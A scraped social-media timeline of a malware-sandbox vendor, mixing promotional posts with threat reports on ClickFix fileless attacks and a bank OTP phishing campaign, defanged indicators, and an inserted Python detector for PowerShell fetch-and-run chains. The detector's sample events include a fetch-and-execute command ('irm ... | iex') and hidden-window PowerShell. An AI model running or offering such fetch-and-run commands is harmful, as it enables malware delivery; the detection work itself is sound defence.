ANY.RUN

@anyrun_app

Empowering businesses with proactive security solutions: Interactive Sandbox, TI Lookup and Feeds. Sign up: https://t.co/8hIX0Qh5ME

Joined February 2017
191 Following · 32.9K Followers
Pinned Tweet
ANY.RUN @anyrun_app ·
🎉 #ANYRUN turns 10: Celebrate with exclusive anniversary offers! Bring together interactive sandbox analysis, threat intel, and automation into your existing SIEM/SOAR. Help your SOC stay resilient against modern threats ⚡️ Secure the offer by May 31: app.any.run/plans/?utm_sou…

ANY.RUN @anyrun_app ·
🚨 #ClickFix attacks surged 500%+ in 2025. No exploit chain or malicious file, just a fake CAPTCHA that tricks employees into running malware themselves. ❗️ ClickFix puts organizations’ credentials, data, and operations at risk. How to detect & protect: any.run/malware-trends…

ANY.RUN @anyrun_app ·
Meet #ANYRUN at @Infosecurity Europe 2026 🇬🇧 📍 Visit Stand C62 to see how CISOs scale enterprise SOC & MSSP operations, improve analysis efficiency, and reduce strategic blind spots against modern malware and phishing threats. 🎟️ Claim your ticket: infosecurityeurope.com/en-gb/register…

ANY.RUN @anyrun_app ·
⚡️ Scale your SOC's triage & response with solutions trusted by 74 Fortune 100 companies. Get an exclusive 10th anniversary deal for your team: app.any.run/plans/?utm_sou…

ANY.RUN @anyrun_app ·
🎯 We added and updated 57 Suricata rules based on real attacker behavior observed in the wild. Explore the examples and strengthen your detection.

#ANYRUNSuricataChangelog 05/18 – 05/24/2026

Here are 10 examples 👇

89003459 | PHISHING [ANY.RUN] Spain-targeted finance-themed phish campaign related HTTP GET request. Example analysis session: app.any.run/tasks/bde57fdd…
89003460 | LOADER [ANY.RUN] Linux/Redtail related HTTP GET request (/sh). Example analysis session: app.any.run/tasks/22943924…
89003461 | FRAUD [ANY.RUN] Suspected Fraud Redirect HTTP GET request. Example analysis session: app.any.run/tasks/aa4fe507…
89003479 | PHISHING [ANY.RUN] Generic Phishkit related URL (/gw.php). Example analysis session: app.any.run/tasks/9a3e0f19…
89003493 | FRAUD [ANY.RUN] Cryptocurrency-themed fraud campaign related URL (/index/index-*.js). Example analysis session: app.any.run/tasks/cc5b63a8…
89003495 | FRAUD [ANY.RUN] Cryptocurrency-themed fraud campaign related URL (/api/index/login). Example analysis session: app.any.run/tasks/32b3314f…
84003033 | STEALER [ANY.RUN] TeamPCP activity observed in HTTP response (python script). Example analysis session: app.any.run/tasks/51f0a857…
84003035 | STEALER [ANY.RUN] TeamPCP exfil activity observed (envelope:key). Example analysis session: app.any.run/tasks/b281830a…
84003036 | STEALER [ANY.RUN] Win32/Generic exfil activity observed (Chromium-Edge-Cookies). Example analysis session: app.any.run/tasks/1aa0f178…
84003037 | STEALER [ANY.RUN] UltimateStealer exfil activity observed. Example analysis session: app.any.run/tasks/97a90799…

Explore the complete ruleset: linkedin.com/pulse/anyrun-s…

ANY.RUN @anyrun_app ·
⚠️ Threat volume increased across nearly every major malware family last week. #XWorm, #Netwire, #Warzone, and #DCRat all saw strong growth, alongside continued #Vidar activity. 📌 Trend to watch: this kind of broad growth usually points to multiple active distribution chains running in parallel. For SOC teams, that means overlapping alerts, noisier triage, and a higher chance of missing escalation paths early. ⚡️ Gain absolute threat visibility inside your SIEM/SOAR. Get an exclusive 10th anniversary deal for your team: app.any.run/plans/?utm_sou… #Top10Malware

ANY.RUN @anyrun_app ·
👨‍💻 Learn how to strengthen your SOC's detection of AI-generated, encrypted, and multi-stage phishing: any.run/phishing/?utm_…

ANY.RUN @anyrun_app ·
⚠️ 15-minute #phishing analysis vs 60 seconds. At scale, the gap costs full FTEs. #ANYRUN Sandbox automates every step and decrypts HTTPS in 100% of sessions, boosting SSL-decrypted phishing detection by 5x. 🎯 Get an exclusive deal for your team: app.any.run/plans/?utm_sou…

ANY.RUN @anyrun_app ·
🚀 Detect critical threats and speed up your response to keep the business safe. Access our exclusive 10th-anniversary deals: app.any.run/plans/?utm_sou…

ANY.RUN @anyrun_app ·
🚨 OAuth device code #phishing bypasses the usual fake-login-page pattern: users sign in through a legitimate authentication flow while attackers receive the access token, leaving fewer classic phishing indicators for SOC teams to detect. In the #EvilTokens campaign, attackers abused Microsoft’s OAuth Device Code flow to gain M365 access without directly stealing credentials. See the full attack flow in an analysis session: app.any.run/tasks/885afc1c… 🔍 Explore 5 social engineering attacks creating SOC blind spots in 2026: any.run/cybersecurity-…

D4rk_Intel @d4rk_intel ·
Happy 10th anniversary to @anyrun_app. I'm super excited to share how I have benefited greatly from this amazing platform. If you're looking to strengthen your team's defenses against emerging threats, take advantage of the discount offer available until May 31. #OSINT #AnyRun
ANY.RUN@anyrun_app

🎉 #ANYRUN turns 10: Celebrate with exclusive anniversary offers! Bring together interactive sandbox analysis, threat intel, and automation into your existing SIEM/SOAR. Help your SOC stay resilient against modern threats ⚡️ Secure the offer by May 31: app.any.run/plans/?utm_sou…


ANY.RUN @anyrun_app ·
🎉 Maximize your SOC’s ROI with better business risk visibility. Get an exclusive 10th anniversary deal for your team: any.run/plans/?utm_sou…

ANY.RUN @anyrun_app ·
🚀 64% of Fortune 500 already rely on #ANYRUN. Real numbers from one of them: 40% faster triage, 24% better MTTR, 35% fewer unnecessary escalations ⚡️ Learn what their SOC did, why it worked, and how to apply it in yours👇 any.run/cybersecurity-…

ANY.RUN @anyrun_app ·
🏦 Over 1,100 financial institutions, from global banks to fintech startups, trust #ANYRUN in their SOC. They lower breach risk, protect customer trust, and avoid millions in incident recovery costs. ⚡️ See how #ANYRUN fits financial SOC workflows: any.run/by-industry/fi…

ANY.RUN @anyrun_app ·
👋 Heading to @CONFidenceConf? Say hi to the #ANYRUN team! We’ll share how enterprise SOCs & MSSPs use our proactive security solutions to investigate threats with greater clarity and more confident decision-making across the full investigation cycle. ⚡️ See you there!

ANY.RUN @anyrun_app ·
🚨 Legitimate B2B Websites Abused for Fileless Malware Delivery: Detect It Early

We’re tracking widespread #ClickFix activity using compromised legitimate websites to deliver fileless malware, lowering suspicion and delaying detection.

⚠️ Finance, banking, healthcare, manufacturing, and tech are among the most exposed industries.

❗️ The activity looks low-risk until fileless execution and outbound C2 traffic are already established.

Attackers inject a lightweight inline JavaScript loader into compromised sites, which retrieves a second-stage payload directly into the victim’s browser from external infrastructure.

The attack chain blends into normal web traffic, relies on PowerShell and in-memory execution, and later shifts C2 communication into the legitimate system process svchost.exe, making malicious activity harder to distinguish from routine system behavior for SOC and MSSP teams.

⚡️ #ANYRUN Sandbox helps teams validate suspicious activity faster and contain fileless attacks before they escalate. Analysts can observe the full execution chain in real time:

Inline JS loader
➡️ User-executed PowerShell (IEX/IRM)
➡️ Hidden second-stage PowerShell and loader retrieval
➡️ Fileless in-memory execution inside powershell.exe
➡️ Follow-on .NET payload delivery
➡️ svchost.exe injection
➡️ Custom TCP C2 🚨

👨‍💻 Learn how #ANYRUN helps security teams detect complex threats and contain incidents faster: any.run/enterprise/?ut…

📈 Scale your SOC with solutions trusted by 74 Fortune 100 companies. Get an exclusive 10th anniversary deal for your team: app.any.run/plans/?utm_sou…

IOCs: /jsrepo?rnd= /teamrepo?rnd= ntdnewtds[.]shop dnsnewtds[.]shop sdntds[.]shop newtdsone[.]shop nttdss[.]shop Dntds[.]shop 178[.]16[.]52[.]232 158[.]94[.]208[.]92 158[.]94[.]208[.]104 91[.]92[.]243[.]161

#ExploreWithANYRUN
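
Added example, not part of the original post or of ANY.RUN's tooling: a defender-side check for the first two PowerShell stages of the chain described above (user-executed IEX/IRM, then a hidden second-stage PowerShell), run over process-creation events. The event field names, the sample events, and the assumption that the user-launched stage is parented by explorer.exe are constructed for illustration.

```python
import re

# Fetch-and-run in one command line: irm/iwr (or long names) together with iex.
FETCH = re.compile(r"\b(irm|iwr|invoke-restmethod|invoke-webrequest)\b", re.I)
EXEC = re.compile(r"\b(iex|invoke-expression)\b", re.I)
# PowerShell accepts any prefix of -WindowStyle, e.g. "-w hidden".
HIDDEN = re.compile(r"-w[a-z]*\s+hidden\b", re.I)

def basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def find_clickfix_chains(events):
    """Return sorted (stage1_pid, stage2_pid or None) pairs.

    Stage 1: PowerShell started from explorer.exe (assumed user launch)
             whose command line both fetches and executes remote content.
    Stage 2: a PowerShell child of stage 1 started with a hidden window.
    Events must be in time order.
    """
    stage1 = {}
    for ev in events:
        if basename(ev["image"]) not in ("powershell.exe", "pwsh.exe"):
            continue
        cmd = ev["cmdline"]
        if (basename(ev["parent_image"]) == "explorer.exe"
                and FETCH.search(cmd) and EXEC.search(cmd)):
            stage1[ev["pid"]] = None
        elif ev["ppid"] in stage1 and HIDDEN.search(cmd):
            stage1[ev["ppid"]] = ev["pid"]
    return sorted(stage1.items())

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
# Constructed sample events (hypothetical schema, placeholder URLs).
EVENTS = [
    {"pid": 4100, "ppid": 2200, "image": PS, "parent_image": EXPLORER,
     "cmdline": 'powershell -c "irm https://example.invalid/a | iex"'},
    {"pid": 4188, "ppid": 4100, "image": PS, "parent_image": PS,
     "cmdline": 'powershell.exe -w hidden -nop -c "<second stage>"'},
    {"pid": 5000, "ppid": 2200, "image": PS, "parent_image": EXPLORER,
     "cmdline": r"powershell.exe Get-ChildItem C:\Users\Public"},
    {"pid": 5100, "ppid": 900, "image": PS,
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"powershell.exe -WindowStyle Hidden -File C:\ops\backup.ps1"},
    {"pid": 6000, "ppid": 2200, "image": PS, "parent_image": EXPLORER,
     "cmdline": "powershell iex (Invoke-RestMethod https://example.invalid/b)"},
]

if __name__ == "__main__":
    print(find_clickfix_chains(EVENTS))
```

A stage-1 hit with no stage-2 child is still returned, so an analyst can review launches where the second stage was blocked or not logged.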

ANY.RUN @anyrun_app ·
Most delays happen between triage and escalation ⚠️ Bridge the gap with a SOC-ready report: clear verdict, AI Summary, MITRE mapping, and key IOCs 🎯 Get better visibility into incident severity & impact fast. Learn how to improve response and reporting: any.run/cybersecurity-…

ANY.RUN @anyrun_app ·
⚡ The fastest way to maximize Microsoft Defender's ROI: layer #ANYRUN on top. Built directly into the MS Defender alert flow, it provides faster MTTR, fewer escalations, and lower Tier 1 workload. 🎯 Set it up in minutes and watch the metrics shift: any.run/cybersecurity-…

h1p 🇨🇴 @hipdead010 ·
A decade of @anyrun_app revolutionizing malware analysis, threat intelligence, and SOC operations! 🥳🔥 And they're celebrating it the way it deserves: two weeks of special offers! Don't let this pass you by. 👇 x.com/anyrun_app/sta…
ANY.RUN@anyrun_app

🎉 #ANYRUN turns 10: Celebrate with exclusive anniversary offers! Bring together interactive sandbox analysis, threat intel, and automation into your existing SIEM/SOAR. Help your SOC stay resilient against modern threats ⚡️ Secure the offer by May 31: app.any.run/plans/?utm_sou…


ANY.RUN @anyrun_app ·
IOCs: Domains bank-esl-org[.]lat review-esl-org[.]lat onlinefraud-esl-org[.]cfd verify-esl-org[.]lat charge-esl-org[.]lat SHA256 chc.png: 69a24c59a815b1b35e7ab3946636c2f7d667269b4ec32b50322307b788512386 image.png: 6318a4002e35166a523c0016af99b51f2c2f72b304569d0519cc0f7389fc8771 member-fdic.svg: 8b69a3707a2ef4a748dd6c9923a1fa17d1ed5d32eee6e60240540217cf30b324 equal-housing-lender.svg: e4bc94279e093f25720c2867e7a08dbfaaa140636f11eab5ac4e204a93a3751e

ANY.RUN @anyrun_app ·
🚨 US Banking Users Targeted in Large-Scale OTP Phishing Campaign

We’re tracking a large-scale #phishing campaign impersonating ESL Federal Credit Union, a U.S. financial institution, with ongoing high-volume activity observed since November 2025. The infrastructure and flow are highly reusable and can be quickly adapted to impersonate other financial organizations.

⚠️ The campaign uses a multi-step phishing flow to steal usernames, passwords, OTP codes, and email verification data, creating serious account takeover and fraud risk at this scale.

❗️ Unlike short-lived phishing operations, this activity has remained active for months with constantly rotating infrastructure. More than 230 phishing domains have already been identified, most registered in .sbs, .cfd, and .click zones.

After credential submission, victim data is sent through a chain of POST requests and forwarded to Telegram bots through attacker-controlled iframe responses. The campaign then moves into a second phishing stage focused on email verification, adding another layer of credential harvesting and OTP interception.

⚡️ With #ANYRUN Sandbox and Threat Intelligence, teams can validate suspicious activity earlier, monitor credential exfiltration in real time, and identify related infrastructure before the campaign spreads further. Analysts can track POST-based credential theft, C2 communication, OTP interception stages, and repeated patterns across hundreds of related samples.

👨‍💻 See the phishing flow, credential exfiltration chain, and collect IOCs: app.any.run/tasks/57a49b17…

📌 Even with constant domain rotation, the campaign keeps reusing the same phishing-page images, endpoint structure, and multi-step authentication flow. These repeating artifacts make the activity trackable across newly deployed phishing sites.

🔍 Hunt for related phishing infrastructure using recurring campaign artifacts in TI Lookup: intelligence.any.run/analysis/looku…

🚀 See how SOC teams improve phishing detection and incident response with #ANYRUN: any.run/phishing/?utm_…

🎉 Celebrate #ANYRUN’s 10th anniversary with us! Explore special offers for high-performing security teams: app.any.run/plans/?utm_sou…

#ExploreWithANYRUN